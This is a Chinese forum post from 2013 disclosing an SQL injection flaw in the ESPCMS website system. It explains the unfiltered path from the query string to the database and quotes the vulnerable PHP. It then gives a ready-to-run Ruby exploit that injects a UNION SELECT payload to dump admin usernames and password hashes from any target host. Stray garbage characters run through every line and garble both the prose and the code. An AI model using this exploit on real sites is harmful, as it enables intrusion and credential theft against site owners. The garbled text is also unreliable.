0×0 漏洞概述0×1 漏洞细节9 }4 e3 ?# S. k2 t) a3 Q: i1 v
0×2 PoC" a4 W# P) v( [' B! }: o# n6 N
/ G5 Y2 Y1 g* T# J, ^) k9 x H; e3 C3 l6 g9 ?, H! R3 D
3 `7 Y: k( z( U9 X; O' z3 Q- u
0×0 漏洞概述1 O4 J" H+ Z6 S( d, R5 \
- j5 ~+ A- g7 i易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。6 q: P. W: H' I& B
其在处理传入的参数时考虑不严谨导致SQL注入发生
) n3 B# }5 I: Y/ T5 }- |: W$ R, X8 {( _6 N. T
/ V$ u6 Y% X' m4 m7 |) j
0×1 漏洞细节3 C5 D# _2 @( Z) U# h
5 M( w W) ]' v变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。' ]' w- N" E) g* o
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。) T& [8 S; g% j
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
& @5 m% b+ [1 a2 }* q/ u+ x
8 h! M# ?1 ~" W+ c- p在/interface/3gwap_search.php文件的in_result函数中: Z8 T) V: ~: Q8 |* j) q$ K+ c
4 i! @2 ^9 m$ _; }7 p
0 R0 Y, z$ ]& c4 ^1 ?
$ H/ s+ a6 P+ O" n) h function in_result() {. k' J4 M3 v! x; l7 \$ f
... ... ... ... ... ... ... ... ...
. ^3 c4 R* J* @; w4 d $urlcode = $_SERVER[ 'QUERY_STRING '];6 {8 s- f. H" G' N& R
parse_str(html_entity_decode($urlcode), $output);2 f0 V. `; b* ]
! ]1 F7 _; [4 p6 b! \! D, {0 i ... ... ... ... ... ... ... ... ...
+ m7 F2 ^' K# R: A3 F) v if (is_array($output['attr' ]) && count($output['attr']) > 0) {! w# m$ J$ C+ [. D# D
, J. R$ T6 n8 t3 g- K6 J
$db_table = db_prefix . 'model_att';& K5 m. e) Y$ F- \/ _* q
; _ Y" N5 `& k( v
foreach ($output['attr' ] as $key => $value) {
8 {# L' X1 v R if ($value) {
f3 f0 @: L( q: j6 Z7 d3 k+ J% |. O! g; _
$key = addslashes($key);
. a- f; Z+ v5 R! ? ~& R$ K# Y $key = $this-> fun->inputcodetrim($key);
' R8 ~ g% B0 ` $db_att_where = " WHERE isclass=1 AND attrname='$key'";6 U- m8 W! H0 o) C
$countnum = $this->db_numrows($db_table, $db_att_where);
" t4 z1 I1 q$ a! j& v if ($countnum > 0) {" e& T4 W( G' o: e
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
9 F" N/ x- K& k9 l0 x" V0 P, C b4 X }
% g* S0 R: a( z* Q }
. A7 ~ S' L6 n' o+ Y# _ }1 J* p9 d# l! G( i/ V8 y5 D
}
" a' V1 A7 q2 u5 N& l8 @: r' B, h if (!empty ($keyword) && empty($keyname)) {
9 U; l' {4 @; X- d( ]8 {4 o $keyname = 'title';
& {/ W1 j. K6 k+ _% h- s $db_where.= " AND a.title like '%$keyword%'" ;4 [3 I& v, N. A
} elseif (!empty ($keyword) && !empty($keyname)) {% c& ~- u* f* J" D
$db_where.= " AND $keyname like '% $keyword%'";
& g7 s" D$ b: z }2 T$ j$ | r+ C) E
$pagemax = 15;
, y p5 _. v7 U3 ~: Y5 J: i: `
! b- k ?7 Y( A $pagesylte = 1;
0 s% g; r3 ~& a& Q$ y% z2 H) b' J- N2 u& v& p+ a5 a; v
if ($countnum > 0) {
4 L2 M2 A. G3 E, L" M: v& y: i" ~+ V
$numpage = ceil($countnum / $pagemax);" W& w( W& E3 f4 [* w
} else {& S. G' w8 S& z
$numpage = 1;9 x4 L4 C0 s+ D% Q% P% C6 T4 R0 ^
}
2 R" I3 I) Z* e& d) m- \ $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;. j8 Q% N) ?- n
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);# N t! D: r5 b( e7 X3 V5 c) Z+ u
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
6 V- q9 ~- i+ H3 Z( a ... ... ... ... ... ... ... ... ...
- Y$ x7 T+ v$ Z' L }1 I) [1 P6 v8 w
) e' g2 ]% F% Z+ M4 C
* z% }. [ B5 Z; g0×2 PoC
E$ V; {. L: L& ~+ | O$ ~$ g' h @* z4 I+ ~9 S' E$ K- j9 ~, g9 m
) s* ~1 \8 s- M4 c
' m6 N0 B' o* G* W( Zrequire "net/http"& \( i5 c. S# s' k+ h2 |% t6 A; o
$ v3 u, h" T: w3 v1 E. F. j. K
def request(method, url)$ i& K% B, Z9 r/ z4 L8 W1 d
if method.eql?("get"); G, S% j2 J+ g$ [) H5 }; E' s* l
uri = URI.parse(url)
, {$ r1 U1 S6 R) R( Z, h. w: t8 e http = Net::HTTP.new(uri.host, uri.port)/ p7 e$ r4 \! x
response = http.request(Net::HTTP::Get.new(uri.request_uri))
: M% E" M) W: b& `6 ] return response
5 v! F N0 R( o; u, k end2 X Q2 i9 g1 t( b
end M# l3 _0 X2 F$ |
3 D4 ~: K3 | D' P* I+ J& x
doc =<<HERE
/ _4 Y2 q5 G# R. Q, O8 P( u0 l-------------------------------------------------------
8 a2 [* ]8 _7 ^$ MEspcms Injection Exploit
# [& n, y) M, n6 U. [Author:ztz
, W; M- g# }, g" m8 V5 YBlog:http://ztz.fuzzexp.org/
9 |6 W# L4 s7 l" ^( g1 N" W$ h. t-------------------------------------------------------! q: P2 u* d M' h# Q4 y3 I% c5 \
' X" r( }$ t3 k5 | w* G" @3 L8 T
HERE
% U- c& Z2 i$ @1 X: |9 e. R( ]$ W+ }6 Z; |* o$ j
usage =<<HERE7 n: o& l0 u8 c! c" X8 s s" b
Usage: ruby #{$0} host port path
1 H: E4 P$ d4 Y; F N- Uexample: ruby #{$0} www.target.com 80 /, z& f5 [/ ?8 {) D+ [
HERE
! D7 h! X. p: C0 u- u
3 o! V5 Z$ x, n4 n. w8 R! Y2 T, Eputs doc6 o S. k! t. s& n% t9 h' ?/ a
if ARGV.length < 3
# ~" }# I4 a+ K# v q puts usage b1 }) L; q9 \
else
4 i t2 U3 t+ ~+ U b9 B+ i1 h $host = ARGV[0]. h* Y: q7 o1 j5 z, E
$port = ARGV[1]0 A' S9 L2 y/ K. \7 s2 L: E" R
$path = ARGV[2]
; M- d! R. x3 g; o+ k- a9 |( S: H
: i5 D" F0 b6 c8 B% G2 E puts "send request..."- U* }+ x8 m1 {: x; c8 @
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&( F( L1 _7 W1 L$ E
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13! |' B# [" o9 Y7 Q; {4 U
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27, M) N5 r1 @; W1 h* ^
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23" w+ ?6 ?$ ?' B+ \- i; _& ?% E
response = request("get", url), N4 r. {, V+ f
result = response.body.scan(/\w+&\w{32}/)
# Z' ~8 }* k4 ?% ?5 t7 }( _ puts result
7 e4 l' f% O y3 {5 c* Aend N' q8 @. z p$ U. L9 K
@- r( S' D% E% _9 c7 b2 x, }1 I
|
发表于 2013-7-27 18:31:52
收藏
支持
反对